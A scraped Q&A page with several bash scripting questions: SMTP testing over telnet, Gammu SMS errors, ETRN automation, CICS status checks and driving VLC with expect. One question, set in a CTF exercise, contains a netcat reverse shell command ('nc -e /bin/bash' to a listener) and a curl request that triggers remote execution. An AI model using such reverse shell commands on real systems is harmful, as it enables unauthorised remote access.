How to test smpt with automated telnet from bash script? - bash

I want to make a bash script that calls automatically smtp port 25 and sends email then I assert that email is queued
I have this much code now
https://github.com/kristijorgji/docker-mailserver/blob/main/tests/smpt.bash
but is not working, I get always
improper command pipelining after DATA from unknown[172.21.0.1]: subject: Test 2022-07-22_17_10_09\r\nA nice test\r\n\r\n
That might be also ok, but please double check my script and give suggestions for improvements if it is ok or fixes
How can I automate this process so I can re-run the script after every configuration change ?
I want to know the best practices

The PIPELINING extension to ESMTP, which is specified in RFC 2920, says:
The EHLO, DATA, VRFY, EXPN, TURN, QUIT, and NOOP commands can only appear as the last command in a group since their success or failure produces a change of state which the client SMTP must accommodate.
This means that you can remove the sleep commands after mail from and rcpt to, but you should introduce a sleep after echo "data" before continuing with the message which is to be delivered. (Just to be clear: You need to wait for the server's response; sleep is just a hack to achieve that.)

Related

Failed to send SMS with Gammu

As you can tell, I have a problem with Gammu. I'm using Gammu to send SMS in conjunction with PRTG Network Monitor, which is used to monitor Networking Devices(i.e Servers, Switches, Routers, Firewalls) and whenever one of the important Services goes Down, PRTG executes some batchfiles I have created, which do Gammu calls to send SMS.
But, whenever one or more services goes down, some of the batchfiles don't get executed at all and I receive the followin error:
Error 102 Error opening device. Unknown, busy or no permissions.
I have seen many related topics to this problem, but I couldn't solve my problem through any of them.
I have configured logging for Gammu, so that everything gets logged whatever happens. I have two errors that are showing up in these logs:
[System error - CreateFile in serial_open, 32, "The process cannot access the file because it is being used by another process.
"]
[System error - SetCommState in serial_close, 6, "The handle is invalid. "]
I have a question about the first error "The process cannot access the file because it is being used by another process.". Which file is it talking about, Gammu or my batchfile?
Here is an example of how I setup my batchfiles:
cd c:\Program Files (x86)\Gammu\bin
Rem User1
gammu sendsms TEXT 0123456789 -text "%*" -report
Rem User2
gammu sendsms TEXT 0123456789 -text "%*" -report
I tried the timeout mechanism before executing the gammu sendsms, but it didn't work at all. Do you guys have any solutions on how I can make the execution wait, until other processes are finished, so that I don't get that message?
Here is the gammuconfig:
[gammu]
device = com4:
connection = at115200
logfile = gammulog
logformat = errors
[gammu1]
device = com3:
connection = at115200
logfile = gammulog
logformat = errors
thank you in advance.
this looks like one process is locking the whole system which sends the SMS (using serial port?)
in this case you need to rewrite your script in a way that it sends those messages not in parallel, but sequentially. Using queues is the way to go.
One possibility is to let PRTG execute batch (or python) script which will add your message to the queue. Another process which would run in loop would fetch new messages from queue and process them (send them). This way you would not execute Gammu more than once at the time. There is disadvantage to this solution and it is that if you have many alerts then it will take longer to send them all since Gammu doesn't support parallel processing
Another option is using some internet sms gateway which would allow you to send many SMS at one time

How do I create a decent bash script to start an ETRN on a mail-server?

Once in a while, I need to ETRN a couple of backup servers (e.g. after maintenance of my own SMTP server).
Normally, I use telnet for that. I go to that server, HELO with my own name and give the ETRN commands. I would like to automate that in a decent way. A simple (but not decent) way would be to start telnet with <<, but the problem is that I do not want to send commands out of order (and the other end may even drop the connection if I do that, haven't tested it yet, but if it works now, it may not work anymore later so I'd like a decent solution and not one that may break later). E.g., I want to wait for the 220 line from the remote SMTP server, then send my HELO, wait for the 250 reply, and only then send the various ETRN commands.
How do I do that in bash? Or do I need to use something else, such as python?

Reverse shells and bash

I'm doing an exercise (basically just a CTF), where we do some exploits of some vulnerable machines. For example, by sending a specially crafted post request, we can make it execute for example
nc -e /bin/bash 10.0.0.2 2546
What I want to do, is to script my way out of this, to make it easier.
Setup a listener for a specific port
Send a post request to make the machine connect back
Send arbitrary data to the server, e.g. to escalate privileges.
Present user with the shell (e.g. which is sent through nc)
This is not a post on how to either hack it or escalate privileges, but my scripting capabilities (especially in bash!) is not the best.
The problem is when I reach step 2. For obvious reason, I can't start nc -lvp 1234 before sending the post request, since it blocks. And I'm faily sure multithreading in bash is not possible (...somebody have probably made it though.)
nc -lp $lp & # Run in background - probably not a good solution
curl -X POST $url --data "in_command=do_dirty_stuff" # Send data
* MAGIC CONNECTION *
And let's say that I actually succeed with a connection back home, how would I manage to send data from my script, though netcat, before presenting the user with a working shell? Maybe something with piping the netcat data to a file, and use that as a "buffer"?
I know there is a lot of questions, and it can't be answered with one answer, but I'd like to hear more about how people would do that. OR if it's completely ridiculous to do in bash.

How to check the status of a CICS region through a JCL/Shell script(unix box)

I want to check the status of a Mainframe CICS region whether it is active or inactive by using a JCL or it is even better if one can suggest me a way to check the status of the CICS region through a shell script. This script/JCL will be used to send a mail to a group saying that the region is active/inactive at a scheduled time.
Please help me with the PROC/UTILITY to be used incase of a JCL or help me with an example of shell script to achieve it
Solution:
I executed the below command on the main screen
TSO STATUS <job-name>
and it gave me whether the job is running or not not. I have executed the same TSO command in my job and taken the output into a dataset.
Just thinking about this briefly I see three alternatives, all involve use of SDSF (System Display and Search Facility).
SDSF in batch
SDSF from Rexx
SDSF from Java
Note that not all mainframe shops license SDSF, which is an IBM product. There exist ISV alternatives; I am aware of these but unfamiliar with them.
If this were being done in the shop where I work, I'd establish an SSH session with the mainframe and submit a batch job to execute the Rexx code described at the link. The batch job could check the status of the CICS region and send the email. My preference comes from having done all those things previously, I've just not put them together like this.
Your mainframe folks may have a ban on Rexx, or not allow SSH connections to their machine, or be unwilling to set up the Rexx interface to SDSF. They may feel similarly about Java.
There may be security implications, the logonID and password will be in your script, yes? What will that ID be authorized to do? How will the script be secured? Is the password for the ID required to expire periodically?
All of which is to say that you must work with (probably multiple) mainframe staff in order to make this process function correctly. None of these questions is designed to stop you from accomplishing your goal; your goal must be accomplished without compromising system security and integrity.
Some other things to think about...
Why are you checking to see if the CICS region is up? If it is because, (e.g.) you will begin a batch process to send messages to the region if it is up and notify someone if it is down, then you are best served building the error handling into your batch process instead.
Mainframe shops typically have some automation software in place to notify people when a significant event occurs - bells ring, lights flash, pagers go off, emails are sent, etc. Maybe what you're trying to do is already being handled in a different manner.
A couple of other options:
You can also run the Status (ST) command - just run TSO background (IKJEFT01) and issue the status command see Status command for the appropriate job names.
You could try running a Cics Command from a batch job see Batch Cemt New copy. If it works CICS is up, fails CICS is not up, I would suggest an inquiry rather than a New Copy though.
One method is to add a job step to the CICS region. Define this job step to ALWAYS run, or even better define it to run ONLY if the CICS job step fails.
In this job step invoke the program that sends e-mails to everyone in the interested parties group.
This way, when the CICS region abends everyone gets a notification, but if the job is brought down cleanly as part of regular operations, no one gets an e-mail.
Alternatively, you might want to always send out an e-mail when the region comes down regardless of the reasons.
This solution avoids having to poll the region to see if it is up. For example, what happens if the region name is changed? The scripts have to be changed! Or what if a second or third production region is added? Again, all the scripts have to be changed.
Finally, you could add a step zero to the region so that everyone gets notified when the region comes UP!!

Sending information from a bash script to a program

I'm making a bash script to send commands to a launched program, the only way I founded on internet was through named pipes.
Is there an easier way to do it all inside the same script? Because named pipes have the problem that I must have 3 scripts, one for managing the program, other sending the information from the main and then the reader to parse the information to the program (If I correctly understood the above link).
And that is a problem as the manager has to call the others because I need the reader to recieve an array of files as input and I found no way of doing so, if you know how please answer this other question.
Thank you
--- 26/01/2012 ---
After Carl post I tried
#!/bin/bash
MUS_DIR="/home/foo/dir/music"
/usr/bin/expect <<-_EOF_
spawn vlc --global-key-next n $MUS_DIR
sleep 5
send 'n'
sleep 5
send "n"
_EOF_
But it doesn't work, it just spawns vlc but it doesn't skip the song
You might want to check out expect(1).
More details about the program you want to communicate with would be useful.
Essentially you just need some sort of inter process communication. Files/pipes/signals/sockets could be used. Write to a specific file in the script and then send an interrupt the program so it knows to check the file, for example.
Depending on your language of choice, and how much time you can spend on this/how big this project will be. You could have the launched program use a thread to listen on a port for TCP packets and react to them. Then in your bash script you could netcat the information, or send an HTTP POST with curl.
Are you sure it's not possible for the application to be started by the script? Allowing the script to just pass arguments or define some environment variables.

Resources